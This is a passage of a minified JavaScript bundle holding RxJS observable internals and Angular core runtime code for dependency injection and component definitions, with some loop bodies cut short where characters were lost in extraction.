we(ie,j){if(de("noDeprecation"))return ie;var Q=!1;return function ae(){if(!Q){if(de("throwDeprecation"))throw new Error(j);de("traceDeprecation")?console.trace(j):console.warn(j),Q=!0}return ie.apply(this,arguments)}}},6854:Pe=>{Pe.exports=function we(de,ie){if(de&&ie)return we(de)(ie);if("function"!=typeof de)throw new TypeError("need wrapper function");return Object.keys(de).forEach(function(Q){j[Q]=de[Q]}),j;function j(){for(var Q=new Array(arguments.length),ae=0;ae{"use strict";function ie(t){return"function"==typeof t}function j(t){const e=t(i=>{Error.call(i),i.stack=(new Error).stack});return e.prototype=Object.create(Error.prototype),e.prototype.constructor=e,e}const Q=j(t=>function(e){t(this),this.message=e?`${e.length} errors occurred during unsubscription:\n${e.map((i,n)=>`${n+1}) ${i.toString()}`).join("\n ")}`:"",this.name="UnsubscriptionError",this.errors=e});function ae(t,a){if(t){const e=t.indexOf(a);0<=e&&t.splice(e,1)}}class I{constructor(a){this.initialTeardown=a,this.closed=!1,this._parentage=null,this._finalizers=null}unsubscribe(){let a;if(!this.closed){this.closed=!0;const{_parentage:e}=this;if(e)if(this._parentage=null,Array.isArray(e))for(const r of e)r.remove(this);else e.remove(this);const{initialTeardown:i}=this;if(ie(i))try{i()}catch(r){a=r instanceof Q?r.errors:[r]}const{_finalizers:n}=this;if(n){this._finalizers=null;for(const r of n)try{E(r)}catch(c){a=null!=a?a:[],c instanceof Q?a=[...a,...c.errors]:a.push(c)}}if(a)throw new Q(a)}}add(a){var e;if(a&&a!==this)if(this.closed)E(a);else{if(a instanceof I){if(a.closed||a._hasParent(this))return;a._addParent(this)}(this._finalizers=null!==(e=this._finalizers)&&void 0!==e?e:[]).push(a)}}_hasParent(a){const{_parentage:e}=this;return e===a||Array.isArray(e)&&e.includes(a)}_addParent(a){const{_parentage:e}=this;this._parentage=Array.isArray(e)?(e.push(a),e):e?[e,a]:a}_removeParent(a){const{_parentage:e}=this;e===a?this._parentage=null:Array.isArray(e)&&ae(e,a)}remove(a){const{_finalizers:e}=this;e&&ae(e,a),a instanceof I&&a._removeParent(this)}}I.EMPTY=(()=>{const t=new I;return t.closed=!0,t})();const $=I.EMPTY;function U(t){return t instanceof I||t&&"closed"in t&&ie(t.remove)&&ie(t.add)&&ie(t.unsubscribe)}function E(t){ie(t)?t():t.unsubscribe()}const C={onUnhandledError:null,onStoppedNotification:null,Promise:void 0,useDeprecatedSynchronousErrorHandling:!1,useDeprecatedNextContext:!1},b={setTimeout(t,a,...e){const{delegate:i}=b;return null!=i&&i.setTimeout?i.setTimeout(t,a,...e):setTimeout(t,a,...e)},clearTimeout(t){const{delegate:a}=b;return((null==a?void 0:a.clearTimeout)||clearTimeout)(t)},delegate:void 0};function _(t){b.setTimeout(()=>{const{onUnhandledError:a}=C;if(!a)throw t;a(t)})}function y(){}const A=w("C",void 0,void 0);function w(t,a,e){return{kind:t,value:a,error:e}}let x=null;function S(t){if(C.useDeprecatedSynchronousErrorHandling){const a=!x;if(a&&(x={errorThrown:!1,error:null}),t(),a){const{errorThrown:e,error:i}=x;if(x=null,e)throw i}}else t()}class B extends I{constructor(a){super(),this.isStopped=!1,a?(this.destination=a,U(a)&&a.add(this)):this.destination=l}static create(a,e,i){return new ve(a,e,i)}next(a){this.isStopped?z(function D(t){return w("N",t,void 0)}(a),this):this._next(a)}error(a){this.isStopped?z(function p(t){return w("E",void 0,t)}(a),this):(this.isStopped=!0,this._error(a))}complete(){this.isStopped?z(A,this):(this.isStopped=!0,this._complete())}unsubscribe(){this.closed||(this.isStopped=!0,super.unsubscribe(),this.destination=null)}_next(a){this.destination.next(a)}_error(a){try{this.destination.error(a)}finally{this.unsubscribe()}}_complete(){try{this.destination.complete()}finally{this.unsubscribe()}}}const K=Function.prototype.bind;function ee(t,a){return K.call(t,a)}class se{constructor(a){this.partialObserver=a}next(a){const{partialObserver:e}=this;if(e.next)try{e.next(a)}catch(i){le(i)}}error(a){const{partialObserver:e}=this;if(e.error)try{e.error(a)}catch(i){le(i)}else le(a)}complete(){const{partialObserver:a}=this;if(a.complete)try{a.complete()}catch(e){le(e)}}}class ve extends B{constructor(a,e,i){let n;if(super(),ie(a)||!a)n={next:null!=a?a:void 0,error:null!=e?e:void 0,complete:null!=i?i:void 0};else{let r;this&&C.useDeprecatedNextContext?(r=Object.create(a),r.unsubscribe=()=>this.unsubscribe(),n={next:a.next&&ee(a.next,r),error:a.error&&ee(a.error,r),complete:a.complete&&ee(a.complete,r)}):n=a}this.destination=new se(n)}}function le(t){C.useDeprecatedSynchronousErrorHandling?function O(t){C.useDeprecatedSynchronousErrorHandling&&x&&(x.errorThrown=!0,x.error=t)}(t):_(t)}function z(t,a){const{onStoppedNotification:e}=C;e&&b.setTimeout(()=>e(t,a))}const l={closed:!0,next:y,error:function ye(t){throw t},complete:y},f="function"==typeof Symbol&&Symbol.observable||"@@observable";function v(t){return t}function P(t){return 0===t.length?v:1===t.length?t[0]:function(e){return t.reduce((i,n)=>n(i),e)}}let G=(()=>{class t{constructor(e){e&&(this._subscribe=e)}lift(e){const i=new t;return i.source=this,i.operator=e,i}subscribe(e,i,n){const r=function h(t){return t&&t instanceof B||function L(t){return t&&ie(t.next)&&ie(t.error)&&ie(t.complete)}(t)&&U(t)}(e)?e:new ve(e,i,n);return S(()=>{const{operator:c,source:d}=this;r.add(c?c.call(r,d):d?this._subscribe(r):this._trySubscribe(r))}),r}_trySubscribe(e){try{return this._subscribe(e)}catch(i){e.error(i)}}forEach(e,i){return new(i=X(i))((n,r)=>{const c=new ve({next:d=>{try{e(d)}catch(T){r(T),c.unsubscribe()}},error:r,complete:n});this.subscribe(c)})}_subscribe(e){var i;return null===(i=this.source)||void 0===i?void 0:i.subscribe(e)}[f](){return this}pipe(...e){return P(e)(this)}toPromise(e){return new(e=X(e))((i,n)=>{let r;this.subscribe(c=>r=c,c=>n(c),()=>i(r))})}}return t.create=a=>new t(a),t})();function X(t){var a;return null!==(a=null!=t?t:C.Promise)&&void 0!==a?a:Promise}const R=j(t=>function(){t(this),this.name="ObjectUnsubscribedError",this.message="object unsubscribed"});let J=(()=>{class t extends G{constructor(){super(),this.closed=!1,this.currentObservers=null,this.observers=[],this.isStopped=!1,this.hasError=!1,this.thrownError=null}lift(e){const i=new Z(this,this);return i.operator=e,i}_throwIfClosed(){if(this.closed)throw new R}next(e){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.currentObservers||(this.currentObservers=Array.from(this.observers));for(const i of this.currentObservers)i.next(e)}})}error(e){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.hasError=this.isStopped=!0,this.thrownError=e;const{observers:i}=this;for(;i.length;)i.shift().error(e)}})}complete(){S(()=>{if(this._throwIfClosed(),!this.isStopped){this.isStopped=!0;const{observers:e}=this;for(;e.length;)e.shift().complete()}})}unsubscribe(){this.isStopped=this.closed=!0,this.observers=this.currentObservers=null}get observed(){var e;return(null===(e=this.observers)||void 0===e?void 0:e.length)>0}_trySubscribe(e){return this._throwIfClosed(),super._trySubscribe(e)}_subscribe(e){return this._throwIfClosed(),this._checkFinalizedStatuses(e),this._innerSubscribe(e)}_innerSubscribe(e){const{hasError:i,isStopped:n,observers:r}=this;return i||n?$:(this.currentObservers=null,r.push(e),new I(()=>{this.currentObservers=null,ae(r,e)}))}_checkFinalizedStatuses(e){const{hasError:i,thrownError:n,isStopped:r}=this;i?e.error(n):r&&e.complete()}asObservable(){const e=new G;return e.source=this,e}}return t.create=(a,e)=>new Z(a,e),t})();class Z extends J{constructor(a,e){super(),this.destination=a,this.source=e}next(a){var e,i;null===(i=null===(e=this.destination)||void 0===e?void 0:e.next)||void 0===i||i.call(e,a)}error(a){var e,i;null===(i=null===(e=this.destination)||void 0===e?void 0:e.error)||void 0===i||i.call(e,a)}complete(){var a,e;null===(e=null===(a=this.destination)||void 0===a?void 0:a.complete)||void 0===e||e.call(a)}_subscribe(a){var e,i;return null!==(i=null===(e=this.source)||void 0===e?void 0:e.subscribe(a))&&void 0!==i?i:$}}function ue(t){return ie(null==t?void 0:t.lift)}function Ie(t){return a=>{if(ue(a))return a.lift(function(e){try{return t(e,this)}catch(i){this.error(i)}});throw new TypeError("Unable to lift unknown Observable type")}}function Ae(t,a,e,i,n){return new Ue(t,a,e,i,n)}class Ue extends B{constructor(a,e,i,n,r,c){super(a),this.onFinalize=r,this.shouldUnsubscribe=c,this._next=e?function(d){try{e(d)}catch(T){a.error(T)}}:super._next,this._error=n?function(d){try{n(d)}catch(T){a.error(T)}finally{this.unsubscribe()}}:super._error,this._complete=i?function(){try{i()}catch(d){a.error(d)}finally{this.unsubscribe()}}:super._complete}unsubscribe(){var a;if(!this.shouldUnsubscribe||this.shouldUnsubscribe()){const{closed:e}=this;super.unsubscribe(),!e&&(null===(a=this.onFinalize)||void 0===a||a.call(this))}}}function Xe(t,a){return Ie((e,i)=>{let n=0;e.subscribe(Ae(i,r=>{i.next(t.call(a,r,n++))}))})}function ht(t,a,e,i){return new(e||(e=Promise))(function(r,c){function d(q){try{k(i.next(q))}catch(Y){c(Y)}}function T(q){try{k(i.throw(q))}catch(Y){c(Y)}}function k(q){q.done?r(q.value):function n(r){return r instanceof e?r:new e(function(c){c(r)})}(q.value).then(d,T)}k((i=i.apply(t,a||[])).next())})}function Le(t){return this instanceof Le?(this.v=t,this):new Le(t)}function $e(t,a,e){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var n,i=e.apply(t,a||[]),r=[];return n={},c("next"),c("throw"),c("return"),n[Symbol.asyncIterator]=function(){return this},n;function c(te){i[te]&&(n[te]=function(pe){return new Promise(function(Re,Fe){r.push([te,pe,Re,Fe])>1||d(te,pe)})})}function d(te,pe){try{!function T(te){te.value instanceof Le?Promise.resolve(te.value.v).then(k,q):Y(r[0][2],te)}(i[te](pe))}catch(Re){Y(r[0][3],Re)}}function k(te){d("next",te)}function q(te){d("throw",te)}function Y(te,pe){te(pe),r.shift(),r.length&&d(r[0][0],r[0][1])}}function xt(t){if(!Symbol.asyncIterator)throw new TypeError("Symbol.asyncIterator is not defined.");var e,a=t[Symbol.asyncIterator];return a?a.call(t):(t=function xe(t){var a="function"==typeof Symbol&&Symbol.iterator,e=a&&t[a],i=0;if(e)return e.call(t);if(t&&"number"==typeof t.length)return{next:function(){return t&&i>=t.length&&(t=void 0),{value:t&&t[i++],done:!t}}};throw new TypeError(a?"Object is not iterable.":"Symbol.iterator is not defined.")}(t),e={},i("next"),i("throw"),i("return"),e[Symbol.asyncIterator]=function(){return this},e);function i(r){e[r]=t[r]&&function(c){return new Promise(function(d,T){!function n(r,c,d,T){Promise.resolve(T).then(function(k){r({value:k,done:d})},c)}(d,T,(c=t[r](c)).done,c.value)})}}}const Gt=t=>t&&"number"==typeof t.length&&"function"!=typeof t;function Co(t){return ie(null==t?void 0:t.then)}function jt(t){return ie(t[f])}function qt(t){return Symbol.asyncIterator&&ie(null==t?void 0:t[Symbol.asyncIterator])}function Qn(t){return new TypeError(`You provided ${null!==t&&"object"==typeof t?"an invalid object":`'${t}'`} where a stream was expected. You can provide an Observable, Promise, ReadableStream, Array, AsyncIterable, or Iterable.`)}const Zt=function Kt(){return"function"==typeof Symbol&&Symbol.iterator?Symbol.iterator:"@@iterator"}();function Bo(t){return ie(null==t?void 0:t[Zt])}function ti(t){return $e(this,arguments,function*(){const e=t.getReader();try{for(;;){const{value:i,done:n}=yield Le(e.read());if(n)return yield Le(void 0);yield yield Le(i)}}finally{e.releaseLock()}})}function ii(t){return ie(null==t?void 0:t.getReader)}function pn(t){if(t instanceof G)return t;if(null!=t){if(jt(t))return function Pt(t){return new G(a=>{const e=t[f]();if(ie(e.subscribe))return e.subscribe(a);throw new TypeError("Provided object does not correctly implement Symbol.observable")})}(t);if(Gt(t))return function Xt(t){return new G(a=>{for(let e=0;e{t.then(e=>{a.closed||(a.next(e),a.complete())},e=>a.error(e)).then(null,_)})}(t);if(qt(t))return ei(t);if(Bo(t))return function Qt(t){return new G(a=>{for(const e of t)if(a.next(e),a.closed)return;a.complete()})}(t);if(ii(t))return function $o(t){return ei(ti(t))}(t)}throw Qn(t)}function ei(t){return new G(a=>{(function ai(t,a){var e,i,n,r;return ht(this,void 0,void 0,function*(){try{for(e=xt(t);!(i=yield e.next()).done;)if(a.next(i.value),a.closed)return}catch(c){n={error:c}}finally{try{i&&!i.done&&(r=e.return)&&(yield r.call(e))}finally{if(n)throw n.error}}a.complete()})})(t,a).catch(e=>a.error(e))})}function $t(t,a,e,i=0,n=!1){const r=a.schedule(function(){e(),n?t.add(this.schedule(null,i)):this.unsubscribe()},i);if(t.add(r),!n)return r}function Ut(t,a,e=1/0){return ie(a)?Ut((i,n)=>Xe((r,c)=>a(i,r,n,c))(pn(t(i,n))),e):("number"==typeof a&&(e=a),Ie((i,n)=>function zo(t,a,e,i,n,r,c,d){const T=[];let k=0,q=0,Y=!1;const te=()=>{Y&&!T.length&&!k&&a.complete()},pe=Fe=>k{r&&a.next(Fe),k++;let Ne=!1;pn(e(Fe,q++)).subscribe(Ae(a,et=>{null==n||n(et),r?pe(et):a.next(et)},()=>{Ne=!0},void 0,()=>{if(Ne)try{for(k--;T.length&&kRe(et)):Re(et)}te()}catch(et){a.error(et)}}))};return t.subscribe(Ae(a,pe,()=>{Y=!0,te()})),()=>{null==d||d()}}(i,n,t,e)))}function Yt(t=1/0){return Ut(v,t)}const ha=new G(t=>t.complete());function co(t){return t&&ie(t.schedule)}function io(t){return t[t.length-1]}function yo(t){return ie(io(t))?t.pop():void 0}function Vn(t){return co(io(t))?t.pop():void 0}function Pn(t,a=0){return Ie((e,i)=>{e.subscribe(Ae(i,n=>$t(i,t,()=>i.next(n),a),()=>$t(i,t,()=>i.complete(),a),n=>$t(i,t,()=>i.error(n),a)))})}function lo(t,a=0){return Ie((e,i)=>{i.add(t.schedule(()=>e.subscribe(i),a))})}function Mo(t,a){if(!t)throw new Error("Iterable cannot be null");return new G(e=>{$t(e,a,()=>{const i=t[Symbol.asyncIterator]();$t(e,a,()=>{i.next().then(n=>{n.done?e.complete():e.next(n.value)})},0,!0)})})}function Sa(t,a){return a?function Kn(t,a){if(null!=t){if(jt(t))return function ao(t,a){return pn(t).pipe(lo(a),Pn(a))}(t,a);if(Gt(t))return function $n(t,a){return new G(e=>{let i=0;return a.schedule(function(){i===t.length?e.complete():(e.next(t[i++]),e.closed||this.schedule())})})}(t,a);if(Co(t))return function bo(t,a){return pn(t).pipe(lo(a),Pn(a))}(t,a);if(qt(t))return Mo(t,a);if(Bo(t))return function Do(t,a){return new G(e=>{let i;return $t(e,a,()=>{i=t[Zt](),$t(e,a,()=>{let n,r;try{({value:n,done:r}=i.next())}catch(c){return void e.error(c)}r?e.complete():e.next(n)},0,!0)}),()=>ie(null==i?void 0:i.return)&&i.return()})}(t,a);if(ii(t))return function no(t,a){return Mo(ti(t),a)}(t,a)}throw Qn(t)}(t,a):pn(t)}function ra(...t){const a=Vn(t),e=function Eo(t,a){return"number"==typeof io(t)?t.pop():a}(t,1/0),i=t;return i.length?1===i.length?pn(i[0]):Yt(e)(Sa(i,a)):ha}function Bd(t={}){const{connector:a=(()=>new J),resetOnError:e=!0,resetOnComplete:i=!0,resetOnRefCountZero:n=!0}=t;return r=>{let c,d,T,k=0,q=!1,Y=!1;const te=()=>{null==d||d.unsubscribe(),d=void 0},pe=()=>{te(),c=T=void 0,q=Y=!1},Re=()=>{const Fe=c;pe(),null==Fe||Fe.unsubscribe()};return Ie((Fe,Ne)=>{k++,!Y&&!q&&te();const et=T=null!=T?T:a();Ne.add(()=>{k--,0===k&&!Y&&!q&&(d=cl(Re,n))}),et.subscribe(Ne),!c&&k>0&&(c=new ve({next:ut=>et.next(ut),error:ut=>{Y=!0,te(),d=cl(pe,e,ut),et.error(ut)},complete:()=>{q=!0,te(),d=cl(pe,i),et.complete()}}),pn(Fe).subscribe(c))})(r)}}function cl(t,a,...e){if(!0===a)return void t();if(!1===a)return;const i=new ve({next:()=>{i.unsubscribe(),t()}});return a(...e).subscribe(i)}function Bn(t){for(let a in t)if(t[a]===Bn)return a;throw Error("Could not find renamed property on target object.")}function Hd(t,a){for(const e in a)a.hasOwnProperty(e)&&!t.hasOwnProperty(e)&&(t[e]=a[e])}function Wo(t){if("string"==typeof t)return t;if(Array.isArray(t))return"["+t.map(Wo).join(", ")+"]";if(null==t)return""+t;if(t.overriddenName)return`${t.overriddenName}`;if(t.name)return`${t.name}`;const a=t.toString();if(null==a)return""+a;const e=a.indexOf("\n");return-1===e?a:a.substring(0,e)}function ss(t,a){return null==t||""===t?null===a?"":a:null==a||""===a?t:t+" "+a}const w2=Bn({__forward_ref__:Bn});function ja(t){return t.__forward_ref__=ja,t.toString=function(){return Wo(this())},t}function La(t){return Kp(t)?t():t}function Kp(t){return"function"==typeof t&&t.hasOwnProperty(w2)&&t.__forward_ref__===ja}class gi extends Error{constructor(a,e){super(function bf(t,a){return`NG0${Math.abs(t)}${a?": "+a.trim():""}`}(a,e)),this.code=a}}function Qa(t){return"string"==typeof t?t:null==t?"":String(t)}function Vu(t,a){throw new gi(-201,!1)}function mr(t,a){null==t&&function mo(t,a,e,i){throw new Error(`ASSERTION ERROR: ${t}`+(null==i?"":` [Expected=> ${e} ${i} ${a} <=Actual]`))}(a,t,null,"!=")}function hi(t){return{token:t.token,providedIn:t.providedIn||null,factory:t.factory,value:void 0}}function Ci(t){return{providers:t.providers||[],imports:t.imports||[]}}function Hu(t){return a0(t,Ll)||a0(t,Mf)}function a0(t,a){return t.hasOwnProperty(a)?t[a]:null}function Xp(t){return t&&(t.hasOwnProperty(Yp)||t.hasOwnProperty(F2))?t[Yp]:null}const Ll=Bn({\u0275prov:Bn}),Yp=Bn({\u0275inj:Bn}),Mf=Bn({ngInjectableDef:Bn}),F2=Bn({ngInjectorDef:Bn});var Da=(()=>((Da=Da||{})[Da.Default=0]="Default",Da[Da.Host=1]="Host",Da[Da.Self=2]="Self",Da[Da.SkipSelf=4]="SkipSelf",Da[Da.Optional=8]="Optional",Da))();let Vm;function Bs(t){const a=Vm;return Vm=t,a}function Jp(t,a,e){const i=Hu(t);return i&&"root"==i.providedIn?void 0===i.value?i.value=i.factory():i.value:e&Da.Optional?null:void 0!==a?a:void Vu(Wo(t))}function Pc(t){return{toString:t}.toString()}var ec=(()=>((ec=ec||{})[ec.OnPush=0]="OnPush",ec[ec.Default=1]="Default",ec))(),dc=(()=>{return(t=dc||(dc={}))[t.Emulated=0]="Emulated",t[t.None=2]="None",t[t.ShadowDom=3]="ShadowDom",dc;var t})();const vo=(()=>"undefined"!=typeof globalThis&&globalThis||"undefined"!=typeof global&&global||"undefined"!=typeof window&&window||"undefined"!=typeof self&&"undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope&&self)(),Ud={},Xn=[],Af=Bn({\u0275cmp:Bn}),e_=Bn({\u0275dir:Bn}),t_=Bn({\u0275pipe:Bn}),n0=Bn({\u0275mod:Bn}),mc=Bn({\u0275fac:Bn}),qd=Bn({__NG_ELEMENT_ID__:Bn});let H2=0;function Wt(t){return Pc(()=>{const e=!0===t.standalone,i={},n={type:t.type,providersResolver:null,decls:t.decls,vars:t.vars,factory:null,template:t.template||null,consts:t.consts||null,ngContentSelectors:t.ngContentSelectors,hostBindings:t.hostBindings||null,hostVars:t.hostVars||0,hostAttrs:t.hostAttrs||null,contentQueries:t.contentQueries||null,declaredInputs:i,inputs:null,outputs:null,exportAs:t.exportAs||null,onPush:t.changeDetection===ec.OnPush,directiveDefs:null,pipeDefs:null,standalone:e,dependencies:e&&t.dependencies||null,getStandaloneInjector:null,selectors:t.selectors||Xn,viewQuery:t.viewQuery||null,features:t.features||null,data:t.data||{},encapsulation:t.encapsulation||dc.Emulated,id:"c"+H2++,styles:t.styles||Xn,_:null,setInput:null,schemas:t.schemas||null,tView:null},r=t.dependencies,c=t.features;return n.inputs=Uu(t.inputs,i),n.outputs=Uu(t.outputs),c&&c.forEach(d=>d(n)),n.directiveDefs=r?()=>("function"==typeof r?r():r).map(o0).filter(i_):null,n.pipeDefs=r?()=>("function"==typeof r?r():r).map(tn).filter(i_):null,n})}function Ds(t,a,e){const i=t.\u0275cmp;i.directiveDefs=()=>("function"==typeof a?a():a).map(o0),i.pipeDefs=()=>("function"==typeof e?e():e).map(tn)}function o0(t){return Un(t)||ur(t)}function i_(t){return null!==t}function yi(t){return Pc(()=>({type:t.type,bootstrap:t.bootstrap||Xn,declarations:t.declarations||Xn,imports:t.imports||Xn,exports:t.exports||Xn,transitiveCompileScopes:null,schemas:t.schemas||null,id:t.id||null}))}function Uu(t,a){if(null==t)return Ud;const e={};for(const i in t)if(t.hasOwnProperty(i)){let n=t[i],r=n;Array.isArray(n)&&(r=n[1],n=n[0]),e[n]=i,a&&(a[n]=r)}return e}const Ot=Wt;function Fr(t){return{type:t.type,name:t.name,factory:null,pure:!1!==t.pure,standalone:!0===t.standalone,onDestroy:t.type.prototype.ngOnDestroy||null}}function Un(t){return t[Af]||null}function ur(t){return t[e_]||null}function tn(t){return t[t_]||null}function ds(t,a){const e=t[n0]||null;if(!e&&!0===a)throw new Error(`Type ${Wo(t)} does not have '\u0275mod' property.`);return e}function us(t){return Array.isArray(t)&&"object"==typeof t[1]}function Is(t){return Array.isArray(t)&&!0===t[1]}function Gu(t){return 0!=(8&t.flags)}function dl(t){return 2==(2&t.flags)}function uc(t){return 1==(1&t.flags)}function gr(t){return null!==t.template}function s0(t){return 0!=(256&t[2])}function Qd(t,a){return t.hasOwnProperty(mc)?t[mc]:null}class u0{constructor(a,e,i){this.previousValue=a,this.currentValue=e,this.firstChange=i}isFirstChange(){return this.firstChange}}function sa(){return h0}function h0(t){return t.type.prototype.ngOnChanges&&(t.setInput=wf),f0}function f0(){const t=r_(this),a=null==t?void 0:t.current;if(a){const e=t.previous;if(e===Ud)t.previous=a;else for(let i in a)e[i]=a[i];t.current=null,this.ngOnChanges(a)}}function wf(t,a,e,i){const n=r_(t)||function X2(t,a){return t[p0]=a}(t,{previous:Ud,current:null}),r=n.current||(n.current={}),c=n.previous,d=this.declaredInputs[e],T=c[d];r[d]=new u0(T&&T.currentValue,a,c===Ud),t[i]=a}sa.ngInherit=!0;const p0="__ngSimpleChanges__";function r_(t){return t[p0]||null}function Ar(t){for(;Array.isArray(t);)t=t[0];return t}function $d(t,a){return Ar(a[t])}function pc(t,a){return Ar(a[t.index])}function d_(t,a){return t.data[a]}function Lc(t,a){return t[a]}function hs(t,a){const e=a[t];return us(e)?e:e[0]}function Um(t){return 64==(64&t[2])}function Rs(t,a){return null==a?null:t[a]}function m_(t){t[18]=0}function sd(t,a){t[5]+=a;let e=t,i=t[3];for(;null!==i&&(1===a&&1===e[5]||-1===a&&0===e[5]);)i[5]+=a,e=i,i=i[3]}const Ua={lFrame:v0(null),bindingsEnabled:!0};function Ku(){return Ua.bindingsEnabled}function bi(){return Ua.lFrame.lView}function Rn(){return Ua.lFrame.tView}function be(t){return Ua.lFrame.contextLView=t,t[8]}function Me(t){return Ua.lFrame.contextLView=null,t}function or(){let t=kf();for(;null!==t&&64===t.type;)t=t.parent;return t}function kf(){return Ua.lFrame.currentTNode}function _c(t,a){const e=Ua.lFrame;e.currentTNode=t,e.isParent=a}function Xu(){return Ua.lFrame.isParent}function Yu(){Ua.lFrame.isParent=!1}function fs(){const t=Ua.lFrame;let a=t.bindingRootIndex;return-1===a&&(a=t.bindingRootIndex=t.tView.bindingStartIndex),a}function ml(){return Ua.lFrame.bindingIndex}function cd(){return Ua.lFrame.bindingIndex++}function ul(t){const a=Ua.lFrame,e=a.bindingIndex;return a.bindingIndex=a.bindingIndex+t,e}function Gm(t,a){const e=Ua.lFrame;e.bindingIndex=e.bindingRootIndex=t,__(a)}function __(t){Ua.lFrame.currentDirectiveIndex=t}function Pf(t){const a=Ua.lFrame.currentDirectiveIndex;return-1===a?null:t[a]}function ld(){return Ua.lFrame.currentQueryIndex}function g_(t){Ua.lFrame.currentQueryIndex=t}function zc(t){const a=t[1];return 2===a.type?a.declTNode:1===a.type?t[6]:null}function M0(t,a,e){if(e&Da.SkipSelf){let n=a,r=t;for(;!(n=n.parent,null!==n||e&Da.Host||(n=zc(r),null===n||(r=r[15],10&n.type))););if(null===n)return!1;a=n,t=r}const i=Ua.lFrame=y_();return i.currentTNode=a,i.lView=t,!0}function C_(t){const a=y_(),e=t[1];Ua.lFrame=a,a.currentTNode=e.firstChild,a.lView=t,a.tView=e,a.contextLView=t,a.bindingIndex=e.bindingStartIndex,a.inI18n=!1}function y_(){const t=Ua.lFrame,a=null===t?null:t.child;return null===a?v0(t):a}function v0(t){const a={currentTNode:null,isParent:!0,lView:null,tView:null,selectedIndex:-1,contextLView:null,elementDepthCount:0,currentNamespace:null,currentDirectiveIndex:-1,bindingRootIndex:-1,bindingIndex:-1,currentQueryIndex:0,parent:t,child:null,inI18n:!1};return null!==t&&(t.child=a),a}function A0(){const t=Ua.lFrame;return Ua.lFrame=t.parent,t.currentTNode=null,t.lView=null,t}const Tr=A0;function b_(){const t=A0();t.isParent=!0,t.tView=null,t.selectedIndex=-1,t.contextLView=null,t.elementDepthCount=0,t.currentDirectiveIndex=-1,t.currentNamespace=null,t.bindingRootIndex=-1,t.bindingIndex=-1,t.currentQueryIndex=0}function Ss(){return Ua.lFrame.selectedIndex}function hl(t){Ua.lFrame.selectedIndex=t}function rr(){const t=Ua.lFrame;return d_(t.tView,t.selectedIndex)}function fi(){Ua.lFrame.currentNamespace="svg"}function ln(){!function cC(){Ua.lFrame.currentNamespace=null}()}function Ju(t,a){for(let e=a.directiveStart,i=a.directiveEnd;e=i)break}else a[T]<0&&(t[18]+=65536),(d>11>16&&(3&t[2])===a){t[2]+=2048;try{r.call(d)}finally{}}}else try{r.call(d)}finally{}}class dd{constructor(a,e,i){this.factory=a,this.resolving=!1,this.canSeeViewProviders=e,this.injectImpl=i}}function Nf(t,a,e){let i=0;for(;ia){c=r-1;break}}}for(;r>16}(t),i=a;for(;e>0;)i=i[15],e--;return i}let ih=!0;function Lf(t){const a=ih;return ih=t,a}let I0=0;const _l={};function ah(t,a){const e=E_(t,a);if(-1!==e)return e;const i=a[1];i.firstCreatePass&&(t.injectorIndex=a.length,$m(i.data,t),$m(a,null),$m(i.blueprint,null));const n=Jd(t,a),r=t.injectorIndex;if(x0(n)){const c=md(n),d=Qm(n,a),T=d[1].data;for(let k=0;k<8;k++)a[r+k]=d[c+k]|T[c+k]}return a[r+8]=n,r}function $m(t,a){t.push(0,0,0,0,0,0,0,0,a)}function E_(t,a){return-1===t.injectorIndex||t.parent&&t.parent.injectorIndex===t.injectorIndex||null===a[t.injectorIndex+8]?-1:t.injectorIndex}function Jd(t,a){if(t.parent&&-1!==t.parent.injectorIndex)return t.parent.injectorIndex;let e=0,i=null,n=a;for(;null!==n;){if(i=P0(n),null===i)return-1;if(e++,n=n[15],-1!==i.injectorIndex)return i.injectorIndex|e<<16}return-1}function Km(t,a,e){!function R0(t,a,e){let i;"string"==typeof e?i=e.charCodeAt(0)||0:e.hasOwnProperty(qd)&&(i=e[qd]),null==i&&(i=e[qd]=I0++);const n=255&i;a.data[t+(n>>5)]|=1<=0?255&a:fC:a}(e);if("function"==typeof r){if(!M0(a,t,i))return i&Da.Host?D_(n,0,i):x_(a,e,i,n);try{const c=r(i);if(null!=c||i&Da.Optional)return c;Vu()}finally{Tr()}}else if("number"==typeof r){let c=null,d=E_(t,a),T=-1,k=i&Da.Host?a[16][6]:null;for((-1===d||i&Da.SkipSelf)&&(T=-1===d?Jd(t,a):a[d+8],-1!==T&&zf(i,!1)?(c=a[1],d=md(T),a=Qm(T,a)):d=-1);-1!==d;){const q=a[1];if(w_(r,d,q.data)){const Y=gl(d,a,e,c,i,k);if(Y!==_l)return Y}T=a[d+8],-1!==T&&zf(i,a[1].data[d+8]===k)&&w_(r,d,a)?(c=q,d=md(T),a=Qm(T,a)):d=-1}}return n}function gl(t,a,e,i,n,r){const c=a[1],d=c.data[t+8],q=nh(d,c,e,null==i?dl(d)&&ih:i!=c&&0!=(3&d.type),n&Da.Host&&r===d);return null!==q?Xm(a,c,q,d):_l}function nh(t,a,e,i,n){const r=t.providerIndexes,c=a.data,d=1048575&r,T=t.directiveStart,q=r>>20,te=n?d+q:t.directiveEnd;for(let pe=i?d:d+q;pe=T&&Re.type===e)return pe}if(n){const pe=c[T];if(pe&&gr(pe)&&pe.type===e)return T}return null}function Xm(t,a,e,i){let n=t[e];const r=a.data;if(function eh(t){return t instanceof dd}(n)){const c=n;c.resolving&&function I2(t,a){const e=a?`. Dependency path: ${a.join(" > ")} > ${t}`:"";throw new gi(-200,`Circular dependency in DI detected for ${t}${e}`)}(function Hn(t){return"function"==typeof t?t.name||t.toString():"object"==typeof t&&null!=t&&"function"==typeof t.type?t.type.name||t.type.toString():Qa(t)}(r[e]));const d=Lf(c.canSeeViewProviders);c.resolving=!0;const T=c.injectImpl?Bs(c.injectImpl):null;M0(t,i,Da.Default);try{n=t[e]=c.factory(void 0,r,t,i),a.firstCreatePass&&e>=i.directiveStart&&function dC(t,a,e){const{ngOnChanges:i,ngOnInit:n,ngDoCheck:r}=a.type.prototype;if(i){const c=h0(a);(e.preOrderHooks||(e.preOrderHooks=[])).push(t,c),(e.preOrderCheckHooks||(e.preOrderCheckHooks=[])).push(t,c)}n&&(e.preOrderHooks||(e.preOrderHooks=[])).push(0-t,n),r&&((e.preOrderHooks||(e.preOrderHooks=[])).push(t,r),(e.preOrderCheckHooks||(e.preOrderCheckHooks=[])).push(t,r))}(e,r[e],a)}finally{null!==T&&Bs(T),Lf(d),c.resolving=!1,Tr()}}return n}function w_(t,a,e){return!!(e[a+(t>>5)]&1<{const 